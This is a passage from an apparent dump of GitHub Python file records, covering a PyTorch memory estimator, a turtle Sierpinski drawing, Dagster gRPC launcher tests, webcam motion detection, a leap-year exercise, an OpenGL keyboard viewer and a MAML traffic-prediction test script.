AlexNet\n\nimport click\n\n\nclass Model(nn.Module):\n\n    def __init__(self):\n        super(Model,self).__init__()\n\n        self.conv0 = nn.Conv2d(1, 16, kernel_size=3, padding=5)\n        self.conv1 = nn.Conv2d(16, 32, kernel_size=3)\n\n    def forward(self, x):\n        h = self.conv0(x)\n        h = self.conv1(h)\n        return h\n\nnum_classes = 1000\nmodel_alexnet = AlexNet(num_classes=num_classes)\nmodel = Model()\n\nmodules = list(model.modules())\n\nbatch_size = 1\nimage_w = 227\nimage_h = 227\n\nfrom torchbenchmark.estimator.sequential_model_estimator import ModuleStats\n\ninput_ = torch.randn(batch_size, 3, image_w, image_h)\n\nms = ModuleStats(model=model_alexnet, input=input_)\n\nparams = ms.get_params()\nprint(\"Params\")\nprint(params)\n\noutput_sizes = ms.get_activations()\nprint(\"Output Sizes\")\nprint(output_sizes)\n\nparam_bits = ms.get_param_bits()\nprint(\"Param Bits\")\nprint(param_bits)\n\nmegabytes = 8.0 * 1024 * 1024\n\nparam_memory_mb = ms.get_param_bits() / megabytes\ninput_memory_mb = ms.get_input_bits() / megabytes\nforward_memory_mb = ms.get_forward_bits() / megabytes\nbackward_memory_mb = ms.get_backward_bits() / megabytes\n\nprint(\"Param Memory MB : {}\".format(param_memory_mb))\nprint(\"Input Memory MB : {}\".format(input_memory_mb))\nprint(\"Forward Memory MB : {}\".format(forward_memory_mb))\nprint(\"Backward Memory MB : {}\".format(backward_memory_mb))\n\nprint(\"Total Memory MB : {}\".format(ms.get_total_memory_mb()))\n\nbits_vs_module = ms.get_param_bits_per_module()\n\nprint(bits_vs_module)\nprint(sum(bits_vs_module)/8/(1024**2))\n\nwidth, _ = click.get_terminal_size()\nclick.echo('-' * width)\nms.get_memory_profile()\nclick.echo('-' * width)\n\n# from fabulous.color import bold, magenta, highlight_green\n#\n# print(bold(magenta('hello world')))\n#\n# print(highlight_green('DANGER WILL ROBINSON!'))\n#\n# print(bold('hello') + ' ' + magenta(' world'))\n#\n# assert len(bold('test')) == 4\n\n\nms.get_memory_profile()","repo_name":"vibhatha/torchbenchmark","sub_path":"torchbenchmark/estimator_benchmark/alexnet_estimator.py","file_name":"alexnet_estimator.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"18460924690","text":"import turtle\r\nimport time\r\n\r\n#goto()\r\n# x - a number or a pair/vector of numbers\r\n# y - a number or None\r\n# If y is None, x must be a pair of coordinates or a Vec2D (for example, as returned by pos()).\r\n# Move the turtle to an absolute position\r\n\r\n\r\ndef dibujarTriangulo(puntos,t):\r\n    t.up() #Lift the pen, do not draw while moving.\r\n    t.goto(puntos[0][0],puntos[0][1]) #goto(-100,-50) \r\n    t.down()\r\n    t.goto(puntos[1][0],puntos[1][1]) #goto(0,100) \r\n    t.goto(puntos[2][0],puntos[2][1]) #goto(100,-50)\r\n    t.goto(puntos[0][0],puntos[0][1]) #goto(-100,0)\r\n\r\ndef triangulo(puntos,color,t):\r\n    t.fillcolor(color)\r\n    t.up() \r\n    t.goto(puntos[0]) #goto(0,100) \r\n    t.down()\r\n    t.begin_fill()\r\n    t.goto(puntos[1]) #goto(100,-50)\r\n    time.sleep(4)\r\n    t.goto(puntos[2]) #goto(-100,0)\t\r\n    time.sleep(4)\r\n    t.goto(puntos[0])\r\n    t.end_fill()\r\n\r\n\r\ndef mitad(p1,p2): #receives two arrays, each with two values; in other words, two coordinates [x,y]\r\n\treturn (p1[0]+p2[0])/2, (p1[1]+p2[1])/2 #average of x and average of y\r\n\r\n\r\n#trace through at degree 2\r\ndef sierpinski(p,grado,miTortuga):\r\n\t#dibujarTriangulo(puntos,miTortuga) #would draw a triangle from the multi-array of 3 coordinates\r\n\tcolores = 
['yellow','orange','red']\r\n\ttriangulo(p,colores[grado],miTortuga)\r\n\ttime.sleep(3)\r\n\tif grado > 0:\r\n\t\t#1st call: \r\n\t    sierpinski([p[0], #[-100,-50]\r\n\t                mitad(p[0], p[1]), #mitad([-100,-50],[0,100])\r\n\t                mitad(p[0], p[2])], #mitad([-100,-50],[100,-50])\r\n\t                grado-1, miTortuga)\r\n\t    time.sleep(3)\r\n\t    sierpinski([p[1],\r\n\t                mitad(p[0], p[1]), #mitad([],[])\r\n\t                mitad(p[1], p[2])], #mitad([],[])\r\n\t                grado-1, miTortuga)\r\n\t    time.sleep(3)\r\n\t    sierpinski([p[2],\r\n\t                mitad(p[2], p[1]), #mitad([],[])\r\n\t                mitad(p[0], p[2])], #mitad([],[])\r\n\t                grado-1, miTortuga)\r\ndef main():\r\n    t = turtle.Turtle()\r\n    miVentana = turtle.Screen()\r\n    t.speed(1)\r\n    puntos = [[-100,-50],[0,100],[100,-50]]\r\n    #puntos = [[-300,-150],[0,300],[300,-150]]\r\n    sierpinski(puntos,2,t)\r\n    #triangulador(puntos,t)\r\n    miVentana.exitonclick()\r\n\r\n\r\nmain()","repo_name":"curiosubermensch/EstructuraDeDatos","sub_path":"sierpinski.py","file_name":"sierpinski.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"38544773866","text":"import time\n\nimport pytest\nfrom dagster import file_relative_path, seven\nfrom dagster.core.definitions.reconstructable import ReconstructableRepository\nfrom dagster.core.errors import DagsterLaunchFailedError\nfrom dagster.core.host_representation.handle import RepositoryLocationHandle\nfrom dagster.core.host_representation.repository_location import GrpcServerRepositoryLocation\nfrom dagster.core.instance import DagsterInstance\nfrom dagster.core.storage.pipeline_run import PipelineRunStatus\nfrom dagster.core.storage.tags import GRPC_INFO_TAG\nfrom dagster.core.test_utils import instance_for_test, poll_for_finished_run, poll_for_step_start\nfrom dagster.core.types.loadable_target_origin import LoadableTargetOrigin\nfrom dagster.grpc.server import GrpcServerProcess\nfrom dagster.utils import find_free_port, merge_dicts\nfrom dagster_tests.core_tests.launcher_tests.test_default_run_launcher import (\n    math_diamond,\n    sleepy_pipeline,\n    slow_pipeline,\n)\n\n\ndef grpc_instance():\n    return instance_for_test(\n        overrides={\n            \"run_launcher\": {\n                \"module\": \"dagster.core.launcher.grpc_run_launcher\",\n                \"class\": \"GrpcRunLauncher\",\n            }\n        },\n    )\n\n\ndef test_run_always_finishes(): # pylint: disable=redefined-outer-name\n    with seven.TemporaryDirectory() as temp_dir:\n        instance = DagsterInstance.local_temp(\n            temp_dir,\n            overrides={\n                \"run_launcher\": {\n                    \"module\": \"dagster.core.launcher.grpc_run_launcher\",\n                    \"class\": \"GrpcRunLauncher\",\n                }\n            },\n        )\n\n        pipeline_run = instance.create_run_for_pipeline(pipeline_def=slow_pipeline, run_config=None)\n        run_id = pipeline_run.run_id\n\n        loadable_target_origin = LoadableTargetOrigin(\n            attribute=\"nope\",\n            python_file=file_relative_path(__file__, \"test_default_run_launcher.py\"),\n        )\n        server_process = GrpcServerProcess(\n            loadable_target_origin=loadable_target_origin, max_workers=4\n        )\n        with server_process.create_ephemeral_client() as api_client:\n            repository_location = GrpcServerRepositoryLocation(\n                RepositoryLocationHandle.create_grpc_server_location(\n                    location_name=\"test\",\n                    port=api_client.port,\n                    socket=api_client.socket,\n                    host=api_client.host,\n                )\n            )\n\n            external_pipeline = repository_location.get_repository(\n                \"nope\"\n            ).get_full_external_pipeline(\"slow_pipeline\")\n\n            assert instance.get_run_by_id(run_id).status == PipelineRunStatus.NOT_STARTED\n\n            launcher = instance.run_launcher\n            
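# launch_run hands the run to the GrpcRunLauncher configured in the instance overrides above.\n            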
launcher.launch_run(\n instance=instance, run=pipeline_run, external_pipeline=external_pipeline\n )\n\n # Server process now receives shutdown event, run has not finished yet\n pipeline_run = instance.get_run_by_id(run_id)\n assert not pipeline_run.is_finished\n assert server_process.server_process.poll() is None\n\n # Server should wait until run finishes, then shutdown\n pipeline_run = poll_for_finished_run(instance, run_id)\n assert pipeline_run.status == PipelineRunStatus.SUCCESS\n\n start_time = time.time()\n while server_process.server_process.poll() is None:\n time.sleep(0.05)\n # Verify server process cleans up eventually\n assert time.time() - start_time < 5\n\n server_process.wait()\n\n\ndef test_terminate_after_shutdown():\n with grpc_instance() as instance:\n repository_location_handle = RepositoryLocationHandle.create_process_bound_grpc_server_location(\n loadable_target_origin=LoadableTargetOrigin(\n attribute=\"nope\",\n python_file=file_relative_path(__file__, \"test_default_run_launcher.py\"),\n ),\n location_name=\"nope\",\n )\n repository_location = GrpcServerRepositoryLocation(repository_location_handle)\n\n external_pipeline = repository_location.get_repository(\"nope\").get_full_external_pipeline(\n \"sleepy_pipeline\"\n )\n\n pipeline_run = instance.create_run_for_pipeline(\n pipeline_def=sleepy_pipeline, run_config=None\n )\n\n launcher = instance.run_launcher\n launcher.launch_run(instance, pipeline_run, external_pipeline)\n\n poll_for_step_start(instance, pipeline_run.run_id)\n\n # Tell the server to shut down once executions finish\n repository_location_handle.client.cleanup_server()\n\n # Trying to start another run fails\n doomed_to_fail_external_pipeline = repository_location.get_repository(\n \"nope\"\n ).get_full_external_pipeline(\"math_diamond\")\n doomed_to_fail_pipeline_run = instance.create_run_for_pipeline(\n pipeline_def=math_diamond, run_config=None\n )\n\n with pytest.raises(DagsterLaunchFailedError):\n launcher.launch_run(\n instance, doomed_to_fail_pipeline_run, doomed_to_fail_external_pipeline\n )\n\n # Can terminate the run even after the shutdown event has been received\n assert launcher.can_terminate(pipeline_run.run_id)\n assert launcher.terminate(pipeline_run.run_id)\n\n # Server process now shuts down cleanly since there are no more executions\n\n\ndef test_server_down():\n with grpc_instance() as instance:\n loadable_target_origin = LoadableTargetOrigin(\n attribute=\"nope\",\n python_file=file_relative_path(__file__, \"test_default_run_launcher.py\"),\n )\n\n server_process = GrpcServerProcess(\n loadable_target_origin=loadable_target_origin, max_workers=4, force_port=True\n )\n\n with server_process.create_ephemeral_client() as api_client:\n repository_location = GrpcServerRepositoryLocation(\n RepositoryLocationHandle.create_grpc_server_location(\n location_name=\"test\",\n port=api_client.port,\n socket=api_client.socket,\n host=api_client.host,\n )\n )\n\n external_pipeline = repository_location.get_repository(\n \"nope\"\n ).get_full_external_pipeline(\"sleepy_pipeline\")\n\n pipeline_run = instance.create_run_for_pipeline(\n pipeline_def=sleepy_pipeline, run_config=None\n )\n\n launcher = instance.run_launcher\n\n launcher.launch_run(instance, pipeline_run, external_pipeline)\n\n poll_for_step_start(instance, pipeline_run.run_id)\n\n assert launcher.can_terminate(pipeline_run.run_id)\n\n original_run_tags = instance.get_run_by_id(pipeline_run.run_id).tags[GRPC_INFO_TAG]\n\n # Replace run tags with an invalid port\n 
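# find_free_port() picks an unused port, so the GRPC_INFO_TAG now points at a server that is not running.\n            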
instance.add_run_tags(\n pipeline_run.run_id,\n {\n GRPC_INFO_TAG: seven.json.dumps(\n merge_dicts({\"host\": \"localhost\"}, {\"port\": find_free_port()})\n )\n },\n )\n\n assert not launcher.can_terminate(pipeline_run.run_id)\n\n instance.add_run_tags(\n pipeline_run.run_id, {GRPC_INFO_TAG: original_run_tags,},\n )\n\n assert launcher.terminate(pipeline_run.run_id)\n\n server_process.wait()\n","repo_name":"G9999/dagster","sub_path":"python_modules/dagster/dagster_tests/core_tests/launcher_tests/test_persistent_grpc_run_launcher.py","file_name":"test_persistent_grpc_run_launcher.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"23985528327","text":"'''\nExercise 2 \n \nAuthors:\n Toyberman Maxim 307097451\n Shvartsman Yevgniy 310360961\n\nDate:14-Apr-15\n'''\nimport numpy as np\nimport cv2\nfrom scipy import signal\nimport threading\n\ncondition=threading.Condition()\nframes=[]\nresult=None\nframe=None\n\ndef captureVideo():\n '''\n this function captures the video from camera in a given interval\n '''\n global frames,frame\n \n frames=[]\n cap = cv2.VideoCapture(0)\n #creating an event that will wakeup every 0.25 seconds\n stopped=threading.Event()\n\n while(not stopped.wait(0.25)):\n # Capture frame-by-frame\n ret,frame = cap.read()\n #sometimes first frame is null due to camera warmup\n if not ret:\n continue \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n frames.append(gray)\n with condition:# condition variable notify on append of frame\n condition.notifyAll()\n \n # When everything done, release the capture \n cap.release()\n cv2.destroyAllWindows()\n \n \n\ndef makeGaussKernel(size_x,size_y):\n '''\n This function creates gaussian kernel \n '''\n kernel=np.zeros((size_x,size_y))\n \n for x in range(0,size_x):\n for y in range(0,size_y):\n kernel[x][y]=np.exp(-(x**2/float(size_x)+(y**2)/float(size_y)))\n \n return kernel\n\nkernel=makeGaussKernel(3,3)\n\ndef convolution2D(frames,kernel):\n '''\n creating a list of convoluted frames \n '''\n convolved=[]\n for frame in frames:\n convolved.append(signal.convolve2d(frame,kernel,mode='same')) \n return convolved\n\ndef weightedMean(frames):\n '''\n calculating the average frame\n '''\n height,width=frames[0].shape\n final=np.zeros((height,width))\n\n weight_sum=0\n for i in range(0,len(frames)):\n weight_sum+=(i+1)\n frames[i]*=(i+1)\n frame=frames[i]/1.0\n final=cv2.add(final,frame)\n\n return (final/float(weight_sum))\n\n\ndef linear_Normalization(lst, i):\n '''\n linear noramlization of the frame (I-Min)*(new_Max-new_Min)/(Max-Min) +New_min\n '''\n newMax=255.0\n Min = lst[i].min()\n Max = lst[i].max()\n lst[i] -= Min\n try:\n \n lst[i] *= newMax / (Max - Min)\n \n except ZeroDivisionError:\n print('')\n \n #return np.uint8(lst)\n\ndef normalize(frames):\n '''\n looping over the frames and applying the linear_normalization\n '''\n new_lst=[]\n \n for i in range(0,len(frames)):\n new_lst.append(np.array(frames[i]))\n linear_Normalization(new_lst, i)\n return new_lst\n\n\ndef trackMovement():\n '''\n tracking movement EX 1 \n '''\n lst=[]\n global frames,result\n while True:\n with condition:\n condition.wait()\n \n convolved=convolution2D(frames,kernel)\n normalized_convolved=normalize(convolved)\n weighthed=weightedMean(normalized_convolved)\n linear_Normalization(weighthed, 0)\n result=np.uint8(weighthed)-np.asarray(normalized_convolved[-1]) ##convolved ch \n \n lst.append(result) \n cv2.imshow('Black_And_White',result)\n if 
cv2.waitKey(1) & 0xFF == ord('q'):\n            break\n\ndef draw_Contours():\n    '''\n    Drawing contours on the frame, based on tracked_movement\n    '''\n    global result,frame\n    while(True):\n        #waiting to be notified for frame insertion\n        with condition:\n            condition.wait()\n        \n        res=np.array(result,dtype='float32')\n        \n        _,thresh = cv2.threshold(res,5,255,cv2.THRESH_BINARY)\n        \n        contours,_ = cv2.findContours(np.uint8(thresh),cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n        cv2.drawContours(frame, contours, -1, (255,255,255), 3)\n        \n        cv2.imshow('color',frame)\n        if cv2.waitKey(1) & 0xFF == ord('q'):\n            break\n    \ndef clear_Frames():\n    global frames\n    frames=[]\n    threading.Timer(1, clear_Frames).start()\n    \ntry:\n    threading.Thread(target=captureVideo).start()\n    threading.Thread(target=trackMovement,).start()\n    threading.Thread(target=clear_Frames,).start()\n    threading.Thread(target=draw_Contours,).start()\nexcept:\n    print (\"Error: unable to start thread\")\n\n\n    ","repo_name":"MaxToyberman/Motion-Detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"33565379598","text":"# TASK\n# An extra day is added to the calendar almost every four years as February 29, and the day is called a leap day. It corrects the calendar for the fact that our planet takes approximately 365.25 days to orbit the sun. A leap year contains a leap day.\n#\n# In the Gregorian calendar, three conditions are used to identify leap years:\n#\n# The year can be evenly divided by 4, is a leap year, unless:\n# The year can be evenly divided by 100, it is NOT a leap year, unless:\n# The year is also evenly divisible by 400. Then it is a leap year.\n# This means that in the Gregorian calendar, the years 2000 and 2400 are leap years, while 1800, 1900, 2100, 2200, 2300 and 2500 are NOT leap years. Source\n#\n# How to Calculate a Leap Year\n# According to the rules of the Gregorian calendar, whether a year is a leap year is determined as follows:\n# Years that are multiples of 400 are leap years.\n#\n# Apart from that, among years that are multiples of 4, only those that are not multiples of 100 are leap years.\n# Task\n#\n# Given a year, determine whether it is a leap year. 
If it is a leap year, return the Boolean True, otherwise return False.\n\ndef is_leap(year):\n leap = False\n if year >= 1900 and year <= pow(10, 5):\n if year % 400 == 0:\n leap = True\n\n elif year % 4 == 0 and year % 100 != 0:\n leap = True\n\n else:\n leap = False\n\n return leap\n\n\nyear = int(input())\nprint(is_leap(year))","repo_name":"eyllcyldrm/Hackerrank-pratikleri","sub_path":"code4.py","file_name":"code4.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39600249171","text":"from keyboard import *\nfrom OpenGL.GLUT import *\nfrom time import *\nfrom math import *\n\n# global storage of various params\nhWindow = 0\nbFill = 0\nbRotation = 1\nRotX = 0\nRotY = 0\nRotZ = 0\nCamPhi = 60\nCamTheta = 0\nCamRange = 15\n\ndef InitGL(width, height):\n \"\"\"\n Initialises the GL scene by enabling various features\n \"\"\"\n glClearColor(0.37, 0.37, 0.44, 1)\n glClearDepth(1.0)\n glDepthFunc(GL_LESS)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_COLOR_MATERIAL)\n\n ResizeGLScene(width, height)\n\ndef ResizeGLScene(width, height):\n \"\"\"\n Function for making appropriate adjustments for window resizing\n \"\"\"\n\n # prevent a divide-by-zero error if the window is too small\n if height == 0:\n height = 1\n\n # reset the current viewport and recalculate the perspective transformation\n # for the projection matrix\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width)/float(height), 0.1, 100.0)\n\n glMatrixMode(GL_MODELVIEW)\n\ndef DrawGLScene():\n \"\"\"\n Draws the scene\n \"\"\"\n global Theta\n global CamPhi, CamTheta, CamRange\n global LightPhi, LightTheta, LightRange\n\n # clear the screen and depth buffer\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n # reset the matrix stack with the identity matrix\n glLoadIdentity()\n\n # CAMERA\n r_xz = CamRange*cos(CamPhi*pi/180)\n x = r_xz*sin(CamTheta*pi/180)\n y = CamRange*sin(CamPhi*pi/180)\n z = r_xz*cos(CamTheta*pi/180)\n\n gluLookAt(x, y, z,\n 0, 0, 0,\n\t 0, 1, 0\n )\n\n # LIGHTING\n\n yellow_tinge = GLfloat_3(1, 0.97, 0.91)\n white = GLfloat_3(1, 1, 1)\n\n glLightfv(GL_LIGHT0, GL_AMBIENT, GLfloat_3(.25, .25, .25))\n glLightfv(GL_LIGHT0, GL_POSITION, GLfloat_3(0, 10, 0))\n\n glLightfv(GL_LIGHT1, GL_DIFFUSE, yellow_tinge)\n glLightfv(GL_LIGHT1, GL_SPECULAR, white)\n glLightfv(GL_LIGHT1, GL_POSITION, GLfloat_4(-13, 5, 3, 3))\n\n glLightfv(GL_LIGHT2, GL_DIFFUSE, yellow_tinge)\n glLightfv(GL_LIGHT2, GL_SPECULAR, white)\n glLightfv(GL_LIGHT2, GL_POSITION, GLfloat_4(13, 5, 3, 3))\n\n glMaterialfv(GL_FRONT_AND_BACK, GL_SPECULAR, [1, 1, 1, 1])\n glEnable(GL_LIGHT0)\n glEnable(GL_LIGHT1)\n glEnable(GL_LIGHT2)\n\n glEnable(GL_LIGHTING)\n\n # Draw the keyboard\n draw_keyboard()\n\n glutSwapBuffers()\n\n sleep(0.01)\n\n\ndef KeyPressed(key, x, y):\n \"\"\"\n Process a keypress\n \"\"\"\n global bFill, CamPhi, CamTheta, CamRange, bRotation\n\n key = ord(key)\n\n if key == 27:\n glutDestroyWindow(hWindow)\n sys.exit()\n elif key == ord('S') or key == ord('s'):\n CamPhi -= 1\n if CamPhi < -90:\n CamPhi = -90\n elif key == ord('W') or key == ord('w'):\n CamPhi += 1\n if CamPhi > 90:\n CamPhi = 90\n elif key == ord('A') or key == ord('a'):\n CamTheta -= 1\n if CamTheta < 0:\n CamTheta += 360\n elif key == ord('D') or key == ord('d'):\n CamTheta += 1\n if CamTheta > 360:\n CamTheta -= 360\n elif key == ord('E') or key == ord('e'):\n CamRange -= 1\n elif key == 
ord('Q') or key == ord('q'):\n CamRange += 1\n elif key == ord('F') or key == ord('f'):\n if bFill == 0:\n glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)\n bFill = 1\n else:\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n bFill = 0\n elif key == ord('R') or key == ord('r'):\n if bRotation == 0:\n bRotation = 1\n else:\n bRotation = 0\n else:\n return\n\ndef main():\n \"\"\"\n Runs the application\n \"\"\"\n global hWindow\n\n # initialise GLUT\n glutInit(\"\")\n glutInitDisplayMode(GLUT_RGBA | GLUT_DEPTH | GLUT_DOUBLE | GLUT_MULTISAMPLE)\n glutInitWindowSize(760, 480)\n glutInitWindowPosition(0, 0)\n\n hWindow = glutCreateWindow(b\"COSC3000: Tom Quirk\")\n\n # setup the display function callback\n glutDisplayFunc(DrawGLScene)\n\n glutIdleFunc(DrawGLScene)\n glutReshapeFunc(ResizeGLScene)\n glutKeyboardFunc(KeyPressed)\n\n # call our init function\n InitGL(1920, 1080)\n\n # enter the window's main loop to set things rolling\n glutMainLoop()\n\n\n# Tell people how to exit, then start the program...\nprint(\"Program Controls\\n\\n\\\n Esc - Exit the program\\n\\\n A-D - Camera: Rotate around object (theta)\\n\\\n W-S - Camera: Rotate around object (phi)\\n\\\n Q-E - Camera: Zoom\\n\\\n F - Toggle Shadding/Wire-frame\\n\\\n R - Toggle Rotation on/off\\n\\\n \")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tomquirk/open-cg-keyboard","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34556020352","text":"import os\nimport argparse\nimport numpy as np\nimport tensorflow as tf\n\nfrom maml import STDN, AttentionSTDN\nfrom maml_data_generator import DataGenerator\nfrom sklearn.metrics import mean_squared_error\n\n\ndef test(model, data_generator, sess, saver):\n train_inputs, train_labels = data_generator.get_all_data(purpose='train')\n train_inputs, train_labels = train_inputs[0], train_labels[0]\n\n test_inputs, test_labels = data_generator.get_all_data(purpose='test')\n test_inputs, test_labels = test_inputs[0], test_labels[0]\n\n train_batch_num = int(train_inputs.shape[1] / update_batch_size)\n test_batch_num = int(test_inputs.shape[1] / update_batch_size)\n\n if len(output_dir) > 0:\n data_generator.save_test_ground_truth(output_dir=output_dir,\n test_data_num=test_batch_num * update_batch_size)\n for epoch in range(epochs):\n total_test_loss = []\n total_outputa = []\n\n for i in range(test_batch_num):\n inputa = test_inputs[:, i * update_batch_size: (i+1) * update_batch_size, :, :]\n labela = test_labels[:, i * update_batch_size: (i+1) * update_batch_size, :]\n if \"att\" in model_type:\n dummy_clusters = np.zeros(shape=(len(inputa), update_batch_size, 1))\n feed_dict = {model.inputa: inputa, model.labela: labela, model.clustera: dummy_clusters}\n else:\n feed_dict = {model.inputa: inputa, model.labela: labela}\n outputa, loss1, = sess.run([model.outputas, model.total_loss1], feed_dict)\n total_outputa.append(outputa)\n total_test_loss.append(loss1)\n total_outputa = np.concatenate(total_outputa, axis=1)\n\n if len(output_dir) > 0:\n np.savez(output_dir + \"/output_\" + model_type, total_outputa)\n saver.save(sess, output_dir + \"/model_\" + model_type)\n print(epoch, np.sqrt(np.mean(total_test_loss)))\n\n total_train_loss = []\n total_train_outputa = []\n\n for i in range(train_batch_num):\n inputa = train_inputs[:, i * update_batch_size: (i + 1) * update_batch_size, :, :]\n labela = train_labels[:, i * update_batch_size: (i + 1) * 
update_batch_size, :]\n if \"att\" in model_type:\n dummy_clusters = np.zeros(shape=(len(inputa), update_batch_size, 1))\n feed_dict = {model.inputa: inputa, model.labela: labela, model.clustera: dummy_clusters}\n else:\n feed_dict = {model.inputa: inputa, model.labela: labela}\n sess.run([model.finetune_op], feed_dict)\n outputa, loss1 = sess.run([model.outputas, model.total_loss1], feed_dict)\n total_train_outputa.append(outputa)\n total_train_loss.append(loss1)\n\n if len(output_dir) > 0:\n np.savez(output_dir + \"/output_train_\" + model_type, total_train_outputa)\n print(\"train:\", epoch, np.sqrt(np.mean(total_train_loss)))\n\ndef main():\n tf.set_random_seed(1234)\n\n print(model_type, \"att\" in model_type, \"meta\" in model_type)\n if \"att\" in model_type:\n model = AttentionSTDN(dim_input=dim_input, dim_output=dim_output, seq_length=seq_length,\n filter_num=64, dim_cnn_flatten=7*7*64,\n dim_fc=512, dim_lstm_hidden=128,\n update_lr=update_lr, meta_lr=meta_lr,\n meta_batch_size=1,\n update_batch_size=update_batch_size,\n test_num_updates=1,\n cluster_num=4, memory_dim=mem_dim,\n cluster_loss_weight=0)\n else:\n model = STDN(dim_input=dim_input, dim_output=dim_output, seq_length=seq_length,\n filter_num=64, dim_cnn_flatten=7*7*64,\n dim_fc=512, dim_lstm_hidden=128,\n update_lr=update_lr, meta_lr=meta_lr,\n meta_batch_size=1,\n update_batch_size=update_batch_size,\n test_num_updates=1)\n model.construct_model()\n\n sess = tf.InteractiveSession()\n saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES), max_to_keep=10)\n\n tf.global_variables_initializer().run()\n tf.train.start_queue_runners()\n\n data_generator = DataGenerator(dim_input=dim_input,\n dim_output=dim_output,\n seq_length=seq_length,\n threshold=threshold)\n if dim_output == 2:\n data_generator.load_train_data(cities=[city], train_prop=int(test_days*24), select_data='all', shuffle=False)\n else:\n data_generator.load_train_data(cities=[city], train_prop=int(test_days*24), select_data='pick', shuffle=False)\n\n if len(save_dir) > 0:\n model_file = save_dir + \"/\" + model_type + \"/\" + test_model_name\n saver.restore(sess, model_file)\n\n print(\"Testing:\", model_file, \"with %d days data\" % test_days)\n else:\n print(\"Target data only\", \"with %d days data\" % test_days)\n test(model, data_generator, sess, saver)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--city', type=str, default='nyc,dc')\n parser.add_argument('--save_dir', type=str, default='')\n parser.add_argument('--model_type', type=str, default='')\n\n parser.add_argument('--test_model', type=str)\n parser.add_argument('--test_days', type=int)\n parser.add_argument('--output_dir', type=str, default='')\n\n parser.add_argument('--update_batch_size', type=int, default=128)\n parser.add_argument('--threshold', type=float, default=0)\n parser.add_argument('--meta_lr', type=float, default=1e-5)\n parser.add_argument('--update_lr', type=float, default=1e-5)\n\n parser.add_argument('--mem_dim', type=int, default=8)\n\n parser.add_argument('--epochs', type=int, default=20)\n parser.add_argument('--gpu_id', type=str, default=\"4\")\n\n dim_output = 2\n dim_input = 7*7*dim_output\n seq_length = 8\n\n args = parser.parse_args()\n\n city = args.city\n save_dir = args.save_dir\n model_type = args.model_type\n\n mem_dim = args.mem_dim\n\n test_model_name = args.test_model\n test_days = args.test_days\n output_dir = args.output_dir\n\n update_batch_size = args.update_batch_size\n threshold = 
args.threshold\n meta_lr = args.meta_lr\n update_lr = args.update_lr\n\n epochs = args.epochs\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n\n main()\n","repo_name":"huaxiuyao/MetaST","sub_path":"maml/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"31"} +{"seq_id":"11281793423","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport math\nimport pandas as pd\nfrom scipy.stats import ttest_1samp, ttest_ind, kendalltau\nfrom scipy import stats\nfrom sklearn import metrics\nfrom sklearn.manifold import TSNE\nimport sys\nimport os\n\nconsistency_eval_path = '/home/schaferd/ae_project/Modular_DSCA_TF_Prediction/'\nsys.path.insert(1,consistency_eval_path)\nfrom check_consistency_ko import calculate_consistency, make_random_ranks\n\nbase_path = \"/nobackup/users/schaferd/ae_project_outputs/model_eval//\"\n\ntf_fc = base_path+\"/__tffc-fc_epochs100_batchsize128_enlr0.001_delr0.0001_moa1.0_rel_conn10_2-10_16.14.43/\"\ntf_shallow = base_path+\"/__tffc-shallow_epochs100_batchsize128_enlr0.001_delr0.01_moa1.0_rel_conn10_2-11_15.50.53/\"\ntf_gene = base_path+\"/__tffc-genefc_epochs100_batchsize128_enlr0.001_delr0.01_moa1.0_rel_conn10_2-10_21.56.47/\"\n\nshallow_fc =base_path+\"/__shallow-fc_epochs100_batchsize128_enlr0.001_delr0.0001_moa1.0_rel_conn10_2-11_15.50.58/\"\nshallow_shallow = base_path+\"/__shallow-shallow_epochs100_batchsize128_enlr0.01_delr0.01_moa1.0_rel_conn10_2-11_15.51.40/\"\nshallow_gene = base_path+\"/__shallow-genefc_epochs100_batchsize128_enlr0.01_delr0.01_moa1.0_rel_conn10_2-11_15.51.25/\"\n\nfc_fc= base_path+\"/__fc-fc_epochs100_batchsize128_enlr0.0001_delr0.0001_moa1.0_rel_conn10_2-10_16.11.55/\"\nfc_shallow =base_path+\"/__fc-shallow_epochs100_batchsize128_enlr0.0001_delr0.001_moa1.0_rel_conn10_2-10_16.14.5/\"\nfc_gene = base_path+\"/__fc-genefc_epochs100_batchsize128_enlr0.0001_delr0.01_moa1.0_rel_conn10_2-10_16.13.22/\"\n\ncols = ['fc_fc', 'fc_g','fc_s','s_fc','s_g','s_s','t_g','t_fc','t_s']\n\nnum_trials = calculate_consistency(fc_fc)[0].shape[0]\nprint( calculate_consistency(fc_fc)[0].shape)\n\nsample_ids = []\nfor col in cols:\n for i in range(num_trials):\n sample_ids.append(col)\nprint(sample_ids)\n\n\ndata = 